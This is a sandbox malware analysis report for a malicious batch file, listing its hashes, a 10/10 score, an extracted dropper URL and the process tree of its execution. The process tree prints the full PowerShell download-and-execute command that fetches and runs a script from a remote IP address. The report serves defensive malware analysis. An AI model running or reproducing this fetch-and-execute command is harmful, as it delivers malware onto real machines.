ab52018e0d9d17dd67e02f4ce6525d4e846f14b36348aab1c7c837c0596ac433 | Triage

Analysis

max time kernel
118s
max time network
121s
platform
windows10_x64
resource
win10v200217
submitted
25-03-2020 22:10

Sharing

Report Analysis Logs

General

Target

3Nu9v5ZW.bat
Size

195B
MD5

eecd3a82bcdfa01935bc0d836b329a5b
SHA1

f26fe622fd6b58796dfb119d4d506758bb63f495
SHA256

ab52018e0d9d17dd67e02f4ce6525d4e846f14b36348aab1c7c837c0596ac433
SHA512

0842c48d0be5286338d2eee0e7af3643851758cd6504b4f4689b19d4ecc82c714ac7aa3c22f457c3dbe42e391b734949bed000fdbf206b8124367ec6ab0ec474

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/3Nu9v5ZW

Signatures

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3876 3512 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 3876 WerFault.exe
Token: SeBackupPrivilege 3876 WerFault.exe
Token: SeDebugPrivilege 3876 WerFault.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

pid	process
3876	WerFault.exe
3876	WerFault.exe
3876	WerFault.exe
3876	WerFault.exe
3876	WerFault.exe
3876	WerFault.exe
3876	WerFault.exe
3876	WerFault.exe
3876	WerFault.exe
3876	WerFault.exe
3876	WerFault.exe
3876	WerFault.exe
3876	WerFault.exe
3876	WerFault.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3Nu9v5ZW.bat"
1⤵
PID:4024

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3Nu9v5ZW');Invoke-ZMQGDQFFVPNG;Start-Sleep -s 10000"
2⤵
PID:3512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 700
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3876

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3876-0-0x00000000049F0000-0x00000000049F1000-memory.dmp

Filesize
4KB

Download
memory/3876-1-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download